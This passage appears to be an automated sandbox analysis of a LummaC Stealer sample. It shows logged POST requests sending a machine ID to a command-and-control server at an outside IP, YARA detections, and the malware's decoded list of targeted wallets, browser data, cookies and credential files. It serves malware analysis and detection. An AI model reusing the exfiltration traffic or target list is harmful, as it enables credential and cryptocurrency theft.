Nov 13, 2024 10:55:25.369750977 CET	2472	OUT	Data Raw: 10 ba 43 de e3 eb ad e1 39 c4 b6 7e 0e 5f a3 be 5f 9e 83 6b 26 8c f5 bd 66 dd 71 33 63 f7 30 bf df 0e 3f a8 d7 fc c1 96 26 ed e7 5f bb de c1 13 d4 5e 41 8d e0 7d 47 7b e6 74 f6 b8 d2 fc ef 0a ef e7 73 fa 0f 7c 27 e1 67 1e b7 2e b6 67 c6 3e e3 8a Data Ascii: C9~__k&fq3c0?&_^A}G{ts\|'g.g>yH$g;>ogxc2NZWZyo>3%65rGl76:m3j3}xx5\|e!!<oA}gc?kH:^W>
Nov 13, 2024 10:55:25.369767904 CET	2472	OUT	Data Raw: c9 5a 3b d4 ff dd b2 b7 5f ff 87 cf bc bd 98 89 bc 17 fa 94 a7 8c d5 f5 8f b6 bf 87 3f 5d dd fe f7 30 7c d6 5f fa eb ff e1 fb 35 da ff 6b fb f3 ec 6f fe d7 32 03 74 fe d7 35 fd bf 9d 70 c0 6e f4 bf 66 1c 30 cd ff cc 5a c0 a2 6b 01 da d2 88 ff e5 Data Ascii: Z;_?]0\|_5ko2t5pnf0ZkrhoYBfkQ??v<0OsA'8~L`~f/^9@m'\]ZOcxY's
Nov 13, 2024 10:55:25.369906902 CET	2472	OUT	Data Raw: 4b 35 12 d3 07 4d 03 e4 1a 81 72 bd 40 db cc e0 3b 76 aa e8 64 cd fd bd 7d 87 aa 8e ad 06 10 e7 49 f3 8b cc fd b5 cc 03 91 49 9a 07 62 d6 09 da 66 7a 70 1e 88 9c 0b 6c b3 40 9e 1b b9 3e f0 bf c9 5b 55 d5 a4 2d 2b e1 3c 60 39 17 58 ae 07 68 ce 0d Data Ascii: K5Mr@;vd}IIbfzpl@>[U-+<`9Xhu<_:=Ok:~qM?]aopNPHnpss{X-^'p~ToXxrd/k`<^`i5#)4#8&g
Nov 13, 2024 10:55:25.369924068 CET	2472	OUT	Data Raw: 6e 5e ff b3 f5 03 33 49 fb 3b e6 83 57 94 97 56 fb 5f 1e 13 cc 9f 6a ae 94 5e 13 d8 84 ff 59 4d f0 af e5 a4 51 ff 2b dd fb 4a a8 ff 6b de fc e2 fe 97 64 80 73 ce f2 93 69 80 67 d5 74 f2 f8 5f 3b 0c f0 a5 d3 fc a4 b9 5f 27 fa 7f f3 d6 ff 95 e6 82 Data Ascii: n^3I;WV_j^YMQ+Jkdsigt_;_'$1}~8_!4k4<Iex`{%L/-s_kMa<=0{.0`x %y_N!yOFs@l1k:A!r?{>9<`}~\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49982	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:55:34.154098034 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:55:34.154546976 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49983	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:55:42.941271067 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:55:42.941651106 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49984	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:55:52.091308117 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:55:52.091700077 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49985	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:56:00.877804995 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:56:00.878206968 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49986	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:56:09.633724928 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:56:09.634155989 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49987	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:56:18.432607889 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:56:18.433078051 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Target ID:	0
Start time:	04:53:32
Start date:	13/11/2024
Path:	C:\Users\user\Desktop\I5jG2Os8GA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\I5jG2Os8GA.exe"
Imagebase:	0x400000
File size:	427'008 bytes
MD5 hash:	E90E793F59C0A6A60182C3F3A597FF0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1263036918.0000000004280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3054761261.0000000002778000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:56:26
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 1720
Imagebase:	0xea0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	11%
Signature Coverage:	51.1%
Total number of Nodes:	792
Total number of Limit Nodes:	25

Executed Functions

Function 004069A1 Relevance: 208.6, APIs: 6, Strings: 112, Instructions: 2052stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 00406AFC
lstrcatW.KERNEL32(?,\Local Storage\leveldb), ref: 00406B06
lstrcatW.KERNEL32(?,?,?), ref: 00408A66
lstrcatW.KERNEL32(?,/BrowserDB), ref: 00408A70

Strings

ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb, xrefs: 00408152
UL6T, xrefs: 0040702D
Hy576xedcon Lite Cli576xedent, xrefs: 004080C7
GAu576xedth Authe576xednticator, xrefs: 00407298
Hist576xedory, xrefs: 0040867F
bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa, xrefs: 00408242
One576xedKey, xrefs: 00407859
dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm, xrefs: 00407AF8
cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao, xrefs: 00407CC1
imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk, xrefs: 00408216
onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl, xrefs: 004080AE
nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm, xrefs: 004081D0
jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf, xrefs: 004075BB
VL6T, xrefs: 0040891C
nknhi576xedehlklippafakaeklbegl576xedecifhad, xrefs: 00408027
bln576xedieiiffboi576xedllknjnepogjhkgnoapac, xrefs: 00408804
ilgcn576xedhelpchnceeipipij576xedaljkblbcobl, xrefs: 004072A7
Au576xedthy, xrefs: 00406CF1
hcflp576xedincpppdclinealmandi576xedjcmnkbgn, xrefs: 0040804F
Sa576xedturn, xrefs: 00407C8A
Log576xedin Da576xedta Fo576xedr Acc576xedount, xrefs: 00408667
By576xedone, xrefs: 004076ED
Cl576xedover, xrefs: 004087AC
Ron576xedin Wall576xedet, xrefs: 004085CE
EnK576xedrypt, xrefs: 00408897
/BrowserDB, xrefs: 00408A68
Tro576xednLi576xednk, xrefs: 00407616
nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig, xrefs: 00407C99
Cy576xedano, xrefs: 00407AE5
kkpllko576xeddjeloidieedojogacfhp576xedaihoh, xrefs: 004088A7
flpici576xedilemghbmfalica576xedjoolhkkenfel, xrefs: 004075E4
iW576xedlt, xrefs: 0040886F
Uni576xedSat, xrefs: 004082D2
nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd, xrefs: 00407D4F
Te576xedrra Stat576xedion, xrefs: 0040724B
kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj, xrefs: 0040887E
Ke576xedplr, xrefs: 004084A0
fhmfend576xedgdocmcbmfikdcog576xedofphimnkno, xrefs: 00408903
ICO576xedNex, xrefs: 004075D4
lodccj576xedjbdhfakaekdiahmedf576xedbieldgik, xrefs: 00407FBB
ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo, xrefs: 004082E5
W576xedeb Da576xedta, xrefs: 00408697
fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi, xrefs: 00408856
lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm, xrefs: 00408084
Bi576xedtClip, xrefs: 00407FD4
oel576xedjdldpnmdbchonieli576xeddgobddffflal, xrefs: 00406D28
Gua576xedrda, xrefs: 00408423
ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml, xrefs: 00407FE3
Aut576xedhenti576xedcator, xrefs: 004074BA
cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne, xrefs: 0040882E
Liqu576xedality, xrefs: 00407EDD
Ja576xedxx Lib576xederty, xrefs: 0040881F
cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae, xrefs: 00407593
Coi576xedn98, xrefs: 00407492
nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj, xrefs: 00407D13
ejbalbako576xedplchlghecda576xedlmeeeajnimhm, xrefs: 00406E55
Te576xedmple, xrefs: 00408068
infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf, xrefs: 00407868
cihm576xedoadaighcej576xedopammfbmddcmdekcje, xrefs: 004086BB
Coinb576xedase, xrefs: 004083FB
hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad, xrefs: 0040840A
Netw576xedork\Cook576xedies, xrefs: 00408505
afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc, xrefs: 004083E2
Nab576xedox, xrefs: 00408018
fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp, xrefs: 00408128
ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc, xrefs: 00407F69
gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb, xrefs: 00406D00
\Local Storage\leveldb, xrefs: 00406AFE
Ste576xedem Key576xedchain, xrefs: 0040827B
bcopg576xedchhojmggmff576xedilplmbdicgaihlkp, xrefs: 004080DA
nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn, xrefs: 004087E8
Bin576xedance Cha576xedin Wal576xedlet, xrefs: 004085F6
mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh, xrefs: 00407F93
bhgho576xedamapcdpbohphigoo576xedoaddinpkbai, xrefs: 004074C9
Sol576xedlet, xrefs: 004088F4
Pha576xedntom, xrefs: 0040822F
jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid, xrefs: 00407D6E
ME576xedW CX, xrefs: 004073DD
Le576xedaf, xrefs: 00407881
His576xedtory, xrefs: 004083AF
EQ576xedUAL, xrefs: 004076A5
Wom576xedbat, xrefs: 004077AD
kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd, xrefs: 00407479
NeoL576xedine, xrefs: 00407CB2
Ma576xedth, xrefs: 004083D3
Te576xedzBox, xrefs: 00407F84
Na576xedsh Ex576xedtension, xrefs: 0040809F
Tr576xedezor Passw576xedord Manager, xrefs: 00408207
Me576xedtaMa576xedsk, xrefs: 00406E46, 004087D8
E576xedOS Authenti576xedcator, xrefs: 00406D19
fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec, xrefs: 004085DD
Bit576xedApp, xrefs: 00408847
hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln, xrefs: 0040768A
Yo576xedroi, xrefs: 00408143
EeS, xrefs: 00406B7F
VL6T, xrefs: 004076C1
Au576xedro, xrefs: 00407584
aea576xedchknmefphepccio576xednboohckonoeemg, xrefs: 004074A1
ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec, xrefs: 00407625
amkmj576xedjmmflddogmhpjloim576xedipbofnfjih, xrefs: 004073C2
dmkam576xedcknogkgcdfhhbddcghach576xedkejeap, xrefs: 004084B0
Ni576xedfty, xrefs: 0040816B
Gu576xedild, xrefs: 004081EB
kpfop576xedkelmapcoipemfend576xedmdcghnegimn, xrefs: 00407EED
Lo576xedgin Da576xedta, xrefs: 0040864F
DAp576xedpPlay, xrefs: 00407FAC
nhnk576xedbkgjikgcigadomkph576xedalanndcapjk, xrefs: 004087BC
Zi576xedlPay, xrefs: 0040746A
KH576xedC, xrefs: 00408040
EeS, xrefs: 00407043
aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp, xrefs: 0040725B
Pol576xedymesh, xrefs: 004075AC

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: /BrowserDB$Au576xedro$Au576xedthy$Aut576xedhenti576xedcator$Bi576xedtClip$Bin576xedance Cha576xedin Wal576xedlet$Bit576xedApp$By576xedone$Cl576xedover$Coi576xedn98$Coinb576xedase$Cy576xedano$DAp576xedpPlay$E576xedOS Authenti576xedcator$EQ576xedUAL$EnK576xedrypt$EeS$EeS$GAu576xedth Authe576xednticator$Gu576xedild$Gua576xedrda$His576xedtory$Hist576xedory$Hy576xedcon Lite Cli576xedent$ICO576xedNex$Ja576xedxx Lib576xederty$KH576xedC$Ke576xedplr$Le576xedaf$Liqu576xedality$Lo576xedgin Da576xedta$Log576xedin Da576xedta Fo576xedr Acc576xedount$ME576xedW CX$Ma576xedth$Me576xedtaMa576xedsk$Na576xedsh Ex576xedtension$Nab576xedox$NeoL576xedine$Netw576xedork\Cook576xedies$Ni576xedfty$One576xedKey$Pha576xedntom$Pol576xedymesh$Ron576xedin Wall576xedet$Sa576xedturn$Sol576xedlet$Ste576xedem Key576xedchain$Te576xedmple$Te576xedrra Stat576xedion$Te576xedzBox$Tr576xedezor Passw576xedord Manager$Tro576xednLi576xednk$UL6T$Uni576xedSat$VL6T$VL6T$W576xedeb Da576xedta$Wom576xedbat$Yo576xedroi$Zi576xedlPay$\Local Storage\leveldb$aea576xedchknmefphepccio576xednboohckonoeemg$afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc$aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp$amkmj576xedjmmflddogmhpjloim576xedipbofnfjih$bcopg576xedchhojmggmff576xedilplmbdicgaihlkp$bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa$bhgho576xedamapcdpbohphigoo576xedoaddinpkbai$bln576xedieiiffboi576xedllknjnepogjhkgnoapac$cihm576xedoadaighcej576xedopammfbmddcmdekcje$cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne$cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae$cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao$dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm$dmkam576xedcknogkgcdfhhbddcghach576xedkejeap$ejbalbako576xedplchlghecda576xedlmeeeajnimhm$ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb$fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp$fhmfend576xedgdocmcbmfikdcog576xedofphimnkno$fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi$flpici576xedilemghbmfalica576xedjoolhkkenfel$fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec$gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb$hcflp576xedincpppdclinealmandi576xedjcmnkbgn$hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad$hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln$iW576xedlt$ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec$ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml$ilgcn576xedhelpchnceeipipij576xedaljkblbcobl$imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk$infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf$jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid$jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf$kkpllko576xeddjeloidieedojogacfhp576xedaihoh$kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd$kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj$kpfop576xedkelmapcoipemfend576xedmdcghnegimn$lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm$lodccj576xedjbdhfakaekdiahmedf576xedbieldgik$mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh$nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj$nhnk576xedbkgjikgcigadomkph576xedalanndcapjk$nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn$nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig$nknhi576xedehlklippafakaeklbegl576xedecifhad$nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm$nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd$oel576xedjdldpnmdbchonieli576xeddgobddffflal$onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl$ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc$ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo
API String ID: 4038537762-1377293222
Opcode ID: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
Instruction ID: d3b4c8d05487b98e51841e16d8283d2e4e5c243acd67d22c1ca68150be5d60ea
Opcode Fuzzy Hash: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
Instruction Fuzzy Hash: 05E229F2E001065AEF2896588D8357F7969EB14304F25453FF80AF63D1EA3C8E558A9F

Function 0042D658 Relevance: 104.1, Strings: 82, Instructions: 1594COMMON

Download Yara Rule

Strings

Wall576xedets/Binan576xedce, xrefs: 0042DB9A
@an(, xrefs: 0042D868
%appd576xedata%\Ethe576xedreum, xrefs: 0042EA9E
*.leveldb, xrefs: 0042ED4A
Op576xedera G576xedX Stab576xedle, xrefs: 0042EBA1
Mozi576xedlla Firef576xedox, xrefs: 0042D7E1
Brave Software, xrefs: 0042ECAD
%appdata%\FileZilla, xrefs: 0042DC54, 0042DC59, 0042DC6C
*.conf, xrefs: 0042DC33
%userprofile%, xrefs: 0042DC83
Wallets/Authy Desktop, xrefs: 0042ED17
Applications/AnyDesk, xrefs: 0042DC2E
*.576xedtxt, xrefs: 0042EEB6
Wallets/Electrum, xrefs: 0042ED60
%appd576xedata%\Ope576xedra Soft576xedware\Op576xedera Sta576xedble, xrefs: 0042D8E5
%programfiles%\Steam\config, xrefs: 0042DCB9
Wallets/JAXX New Version, xrefs: 0042ED45
Chromi576xedum, xrefs: 0042E75F
Wallets/Atomic, xrefs: 0042ECE4
%appdata%\Electrum\wallets, xrefs: 0042ED66
Wal576xedlets/Bi576xednance, xrefs: 0042DBD5
%programfiles%\Steam, xrefs: 0042DC9E
%localappdata%\Coinomi\Coinomi\wallets, xrefs: 0042ED06
%appda576xedta%\Op576xedera Softwa576xedre\Op576xedera Neo576xedn\Us576xeder Da576xedta, xrefs: 0042EC90
%appdata%\AnyDesk, xrefs: 0042DC38
Wall576xedets/Eth576xedereum, xrefs: 0042EE17
Ed576xedge, xrefs: 0042E788
%userpro576xedfile%, xrefs: 0042DB79
.fin576xedger-pr576xedint.fp, xrefs: 0042DD7C
%appdata%\Bitcoin\wallets, xrefs: 0042ED34
Applications/Telegram, xrefs: 0042DEF6
%lo576xedcalapp576xeddata%\Go576xedogle\Chr576xedome\Us576xeder Dat576xeda, xrefs: 0042E957
ST4, xrefs: 0042D951
%locala576xedppdata%\Mic576xedrosoft\Edge\Us576xeder Data, xrefs: 0042DA33
%localappdata%\Comodo\Dragon\User Data, xrefs: 0042ECC7
*.kbdx, xrefs: 0042DC7E
Wallets/Ledger Live, xrefs: 0042EADF
$jRk, xrefs: 0042DED9
%appd576xedata%\El576xedectrum\wal576xedlets, xrefs: 0042E541
%appdata%\Exodus\exodus.wallet, xrefs: 0042EACE
%appdata%\Telegram Desktop, xrefs: 0042DF00
%localappdata%\CocCoc\Browser\User Data, xrefs: 0042DA83
Applications/Steam/config, xrefs: 0042DCAF
Chr576xedome, xrefs: 0042E948
Applications/FileZilla, xrefs: 0042DC49, 0042DC4E, 0042DC66
sitemanager.xml, xrefs: 0042DC67
%appd576xedata%\Op576xedera Softw576xedare\Op576xedera GX Sta576xedble, xrefs: 0042EBB0
%appda576xedta%\Mo576xedzilla\Fir576xedefox\Prof576xediles, xrefs: 0042D7F0
%localappdata%\BraveSoftware\Brave-Browser\User Data, xrefs: 0042ECB2
Aan(, xrefs: 0042D889
Wallets/Exodus, xrefs: 0042EAC3
TT4, xrefs: 0042DF2F
sim576xedple-sto576xedrage.j576xedson, xrefs: 0042EE6A
Wallets/Bitcoin core, xrefs: 0042ED2E
%appdata%\Authy Desktop\Local Storage\leveldb, xrefs: 0042ED1D
Op576xedera Sta576xedble, xrefs: 0042E4D1
CocCoc, xrefs: 0042DA7E
%appdata%\atomic\Local Storage\leveldb, xrefs: 0042ECEF
ssfn*, xrefs: 0042DC99
*576xed, xrefs: 0042E532
y_B>, xrefs: 0042E011
Wallets/Coinomi, xrefs: 0042ED00
Op576xedera Neo576xedn, xrefs: 0042EC81
Import576xedant File576xeds/Pro576xedfile, xrefs: 0042F04F
recentservers.xml, xrefs: 0042DC4F
Kom576xedeta, xrefs: 0042E818
Wall576xedets/Ele576xedctrum, xrefs: 0042EE9A
%appdata%\com.liberty.jaxx\IndexedDB, xrefs: 0042ED4F
?, xrefs: 0042ECD4
Comodo, xrefs: 0042ECC2
ap576xedp-sto576xedre.js576xedon, xrefs: 0042DBA9
Aan(, xrefs: 0042DB43
q7 C, xrefs: 0042E450
Applications/Steam, xrefs: 0042DC94
%loc576xedalappda576xedta%\Kom576xedeta\Us576xeder Da576xedta, xrefs: 0042E827
%localappdata%\Chro576xedmium\Use576xedr Data, xrefs: 0042E76E
Applications/KeePass, xrefs: 0042DC79
TT4, xrefs: 0042EB40
%appda576xedta%\Bina576xednce, xrefs: 0042DBB8, 0042DD8C, 0042EE79
%appdata%\Ledger Live, xrefs: 0042EAE5
Wal576xedlets/Bin576xedance, xrefs: 0042EE5B
keyst576xedore, xrefs: 0042EE27

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: $jRk$%appd576xedata%\El576xedectrum\wal576xedlets$%appd576xedata%\Ethe576xedreum$%appd576xedata%\Op576xedera Softw576xedare\Op576xedera GX Sta576xedble$%appd576xedata%\Ope576xedra Soft576xedware\Op576xedera Sta576xedble$%appda576xedta%\Bina576xednce$%appda576xedta%\Mo576xedzilla\Fir576xedefox\Prof576xediles$%appda576xedta%\Op576xedera Softwa576xedre\Op576xedera Neo576xedn\Us576xeder Da576xedta$%appdata%\AnyDesk$%appdata%\Authy Desktop\Local Storage\leveldb$%appdata%\Bitcoin\wallets$%appdata%\Electrum\wallets$%appdata%\Exodus\exodus.wallet$%appdata%\FileZilla$%appdata%\Ledger Live$%appdata%\Telegram Desktop$%appdata%\atomic\Local Storage\leveldb$%appdata%\com.liberty.jaxx\IndexedDB$%lo576xedcalapp576xeddata%\Go576xedogle\Chr576xedome\Us576xeder Dat576xeda$%loc576xedalappda576xedta%\Kom576xedeta\Us576xeder Da576xedta$%locala576xedppdata%\Mic576xedrosoft\Edge\Us576xeder 